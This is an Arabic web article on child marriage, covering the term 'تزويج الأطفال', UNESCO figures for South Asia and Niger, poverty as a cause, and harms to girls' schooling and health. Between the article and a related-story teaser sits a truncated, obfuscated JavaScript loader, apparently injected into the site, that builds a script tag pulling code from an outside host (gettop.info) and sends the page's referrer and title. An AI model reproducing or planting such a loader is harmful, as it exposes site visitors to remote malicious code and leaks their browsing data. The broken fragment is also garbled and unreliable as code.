الرئيسية / الأسرة / الزواج المبكر .. سرقة للطفوله ومحاوله يائسه للهروب من الفقر

الزواج المبكر .. سرقة للطفوله ومحاوله يائسه للهروب من الفقر

أمانى محمد فهمى /محمد زوين

“الزواج المبكر” كان ولا يزال ضربا من ضروب الإكراه ، اضطرت المرأة إلى أن تحمل وزره عبر التاريخ.لقد ارتأت منظمات المجتمع المدني اعتماد مصطلح “تزويج الأطفال” عوضا عن “الزواج المبكر” المتداول لوصف المشكلة. فهو “تزويج” وليس “زواج” لأنه يفتقد لعنصر الإرادة ، ففي الغالب يتم التأثير على الفتاة أو الفتى للقبول بفكرة الزواج من طرف ثالث بمختلف وسائل الإقناع . وحتى في حالة اقتناع الفتاة أو الفتى ، فمن الصعب التحدث عن إرادة لفقدان القدرة على اتخاذ القرارات لعدم اكتمال البلوغ النفسي والعاطفي والإجتماعي
 ومن جهة أخرى تعتبره هذه المنظمات تزويجا “لأطفال” لأن المواثيق الدولية تعرف الطفل بأنه “كل من هو دون سن الثامنة عشرة” ومن ثم فإن المعطيات الإحصائية تبين أن المشكلة هي في الغالب مشكلة الفتيات وليس الفتيان. فبعد هذا الزواج ، ينتظر من هذه الطفلة أن تترك حياة الطفولة البريئة وتتبنى مهام ووظائف جديدة كزوجة ، حياة تكون فيها الأم المربية والمعلمة والقائمة بكافة أعمال المنزل .
ووفقا لإحصائية كانت قد أجرتها منظمة اليونسكو في 49 بلد في العالم ، فإن 48 بالمائة من نساء جنوب أسيا من سن 15 إلى 24 عام كانوا قد تزوجوا قبل بلوغهم 18 عام. أيضا في قارة أفريقيا نرى بلد مثل النيجر كانت قد سجلت أعلى نسبة من النساء مابين 20 إلى 24 عام كانوا قد تزوجوا في سن 18 عام بواقع 77 بالمائة ، على العكس في جنوب أفريقيا حيث شهدت أقل نسبة 8 بالمائة.
إن العوامل المتسببة في انتشار هذه الظاهرة عديدة منها : رغبة الفتاة التحرر من سلطة الأبوين والشعور بالإستقلالية ، أيضا الفقر يعد عامل أخر وسبب حقيقي في انتشار هذه الظاهرة ، ففي كثير من الثقافات تعتبر الفتاة عبئا اقتصاديا على أسرتها ، لذا فإنها تلجأ لهذا الزواج بحثا عن المال أو على أقل تقدير المساهمة في تخفيف نفقات أسرتها
ويساهم تزويج الأطفال في سن المراهقة بشكل كبير في استمرارية تراجع مكانة المرأة لما له من تأثيرات خطيرة على كافة الأصعدة ، فالزواج المبكر في أغلب الأحيان يمنع الفتاة من استكمال تعليمها الذي يعد سلاحها الأول للإستقلال والنضوج ، إضافة إلى التبعات الصحية الخطيرة التي يحملها الزواج المبكر على الفتيات خاصة نتيجة الحمل بجانب أيضا الإنعكاسات الصحية على الجنين والرضيع‎ ‎لأم لم يكتمل نموها الجسدي والعاطفي والنفسي.

le(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))document.currentScript.parentNode.insertBefore(s, document.currentScript);

شاهد أيضاً

شيخ الأزهر: لا يمكن حصر أسباب ارتفاع نسبة الطلاق في «أمرين»

قال الإمام الأكبر الدكتور أحمد الطيب، شيخ الأزهر، إن أهم أسباب التى تؤدي للطلاق هو ...